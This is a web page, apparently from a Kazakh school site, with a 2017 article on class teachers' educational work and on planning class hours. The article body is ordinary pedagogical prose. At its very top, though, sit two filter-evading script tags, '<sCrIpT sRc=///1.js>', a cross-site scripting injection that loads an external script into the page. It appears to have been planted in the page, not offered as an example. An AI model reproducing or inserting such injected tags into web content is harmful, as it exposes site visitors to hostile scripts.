<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.02.2017

ТӘРБИЕ ЖҰМЫСТАРЫ

Тәрбие жұмыстарын жүргізу қиын да күрделі іс. Бұл жерде сынып жетекшінің білгірлігі ауадай қажет.

Сынып жетекші оқушыларды адамгершілікке тәрбиелеуде тәрбие жұмысының мазмұны мен түрлерін білуі қажет. Мұғалім сынып сағаттарын тәрбие жұмысының принциптеріне негіздеп, лайықты өткізілуіне міндетті және тәрбиені еңбекпен, тұрмыспен байланыстырып, оқушылардың белсенділігінің, дербестігінің дамуына бағыштауы керек..

Тәрбие ісінің нәтижесі. Жұмыс жоспарының орындалуын, мақсатына жеткендігін, білімділік, практикалық және тәрбиелік мәнісін дәлелдеу.

Қорытынды және ұсыныс. Пайдалы және жағымсыз жақтарын және оны түзету жағын көрсету.

Тәрбие – педагогикалық үрдістің өте маңызды, әрі күрделі де ұзақ мерзімді қажет ететін құрамдас бөлігі екендігі бізге мәлім. Олай болса, оқушылардың сабақтан тыс уақытын тиімді ұйымдастыру, тәрбиелік шаралардың нәтижесін арттыру одан да күрделі мәселе. Мектеп жағдайында бұл жауапты мәселені жүзеге асыру сынып жетекшілеріне жүктеледі. Оны нәтижелі ұйымдастыру, сынып жетекшілерінің педагогикалық білім деңгейінің сапасы мен педагогтік шеберлігіне байланысты. Сынып сағаты-бұл жаппай тәрбие жұмыстарын ұйымдастырудың ең көп таралған түрлерінің бірі. Кейде оны тәрбие сағаты немесе сынып жетекшілігінің сағаты деп атайды.

Сынып сағатын жақсы өткізу сабақты жақсы бергеннен гөрі әлдеқайда қиын екенін ескерген жөн. Бұл жерде көп нәрсе сынып жетекшісінің шығармашылығына, оқушылар белсенділігінің даму дәрежесіне байланысты. Егер бір сынып сағаты екіншісіне ұқсамаса егер олардың мазмұны әр түрлі және сыныптың күрделі өмірімен байланысты болса, онда жақсы.

Сынып сағатына дайындалу үстінде оның қалай, қай формада өткізілетіндігін күні бұрын ойластырудың  маңызы зор. Тәрбие жұмысын жоспарлағанда оқушыларға идеялық-тәрбиелік ықпалдың барлық түрлерінің байланысы мен  бірлігіне қол жеткізудің және практикалық істерді кешенді әдіс негізінде ұйымдастырудың маңызы өте зор.

Просмотров: 521

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу